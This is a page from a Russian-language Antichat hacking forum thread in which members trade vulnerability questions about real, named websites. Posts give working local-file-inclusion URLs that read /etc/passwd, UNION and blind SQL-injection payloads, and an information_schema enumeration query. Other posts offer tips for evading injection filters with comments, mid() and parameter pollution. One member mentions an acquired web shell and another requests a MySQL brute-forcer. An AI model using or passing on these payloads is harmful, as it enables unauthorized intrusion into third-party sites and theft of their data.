HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1338 из 2438 « Первая < 338838123812881328 1334 1335 1336 1337 1338 1339 1340 1341 1342 13481388143818382338 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #13371  
Старый 23.05.2010, 12:55
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию
http://www.b2match.com/smagua/index.php?file=list.php

http://www.b2match.com/smagua/index.php?file=../../../etc/passwd%00.php

Здесь есть инклуд?
 
Ответить с цитированием

  #13372  
Старый 23.05.2010, 13:48
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию
http://www.b2match.com/smagua/index.php?file=./js/jquery-ui-1.7.2.custom.min.js%00.php
http://www.b2match.com/smagua/index.php?file=../info/features.htm
http://www.b2match.com/smagua/index.php?file=../info/index.php

Ты сам как думаешь, что это?
 
Ответить с цитированием

  #13373  
Старый 23.05.2010, 14:25
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
есть шелл зделал connect на mysql базу..
отсюда как зделать мета на саыте ?
 
Ответить с цитированием

  #13374  
Старый 23.05.2010, 14:29
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию
Имеется скуля на сайте, но всякие union, select, substring бьются на два слова (в середину вставляется пробел) и скуля соответственно не крутится. Регистр менял.
Как крутить?

P.S. Бьется юнион и селект в том случае, если в строке идет сначала union, а потом select
select+union - не бьет
uniondasdsadsadselect не бьет
uinon dadasdsadsadasda select бьет
union/*dasdasdasdsadsd*/select бьет

substring( бьет
substring *без скобки* не бьет
Последний раз редактировалось wildshaman; 23.05.2010 в 14:35..
 
Ответить с цитированием

  #13375  
Старый 23.05.2010, 14:41
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
С нами: 8762549

Репутация: 1069


По умолчанию
Цитата:
Сообщение от wildshaman  
Имеется скуля на сайте, но всякие union, select, substring бьются на два слова (в середину вставляется пробел) и скуля соответственно не крутится. Регистр менял.
Как крутить?

P.S. Бьется юнион и селект в том случае, если в строке идет сначала union, а потом select
select+union - не бьет
uniondasdsadsadselect не бьет
uinon dadasdsadsadasda select бьет
union/*dasdasdasdsadsd*/select бьет

substring( бьет
substring *без скобки* не бьет
ну попробовать применить http parameter pollution для обхода фильтра
вместо substring() заюзать mid(), хз чё ещё =\
з.ы. с mid'ом реально работает кстати:
...+and+mid(@@version,1,1)=5--+
Последний раз редактировалось aka_zver; 23.05.2010 в 14:51..
 
Ответить с цитированием

  #13376  
Старый 23.05.2010, 15:41
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
Подниму свой вопрос ещо раз.
Ну жен брут для MySQL серверов на удаленном порту (3306). Не через phpmyadmin!!
 
Ответить с цитированием

  #13377  
Старый 23.05.2010, 16:01
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию
http://previous.colop.com/sl/products/colop--printer_dater/product.php?id=-colop:11322000'+union+select+1,2,3,4,5,6,7,8,9,10, 11,12+--+


Здесь есть SQL-inj?
 
Ответить с цитированием

  #13378  
Старый 23.05.2010, 21:42
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию
Цитата:
Сообщение от FlaktW  
http://previous.colop.com/sl/products/colop--printer_dater/product.php?id=-colop:11322000'+union+select+1,2,3,4,5,6,7,8,9,10, 11,12+--+


Здесь есть SQL-inj?
слепая есть =>
http://previous.colop.com/sl/products/colop--printer_oval/product.php?id=colop:13026000'+and+(select substring(version(),1,1))=4/*
если пытаться вывести и первый запрос возращ. фелсе, то ошибка в XML. мб Xpath и SQLinj хз
Последний раз редактировалось Strilo4ka; 23.05.2010 в 21:47..
 
Ответить с цитированием

  #13379  
Старый 23.05.2010, 21:52
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию
Цитата:
Сообщение от l1ght  
методом научного тыка:
http://www.stockhouse.com/adredirect.asp?sid=select true
http://www.stockhouse.com/adredirect.asp?sid=+select true
http://www.stockhouse.com/adredirect.asp?sid=select+ false
=> 'select%'
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)
спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?

http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb
 
Ответить с цитированием

  #13380  
Старый 23.05.2010, 22:05
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от YuNi|[c  
спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?

http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb
+where+table_schema=
 
Ответить с цитированием
Ответ
Страница 1338 из 2438 « Первая < 338838123812881328 1334 1335 1336 1337 1338 1339 1340 1341 1342 13481388143818382338 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.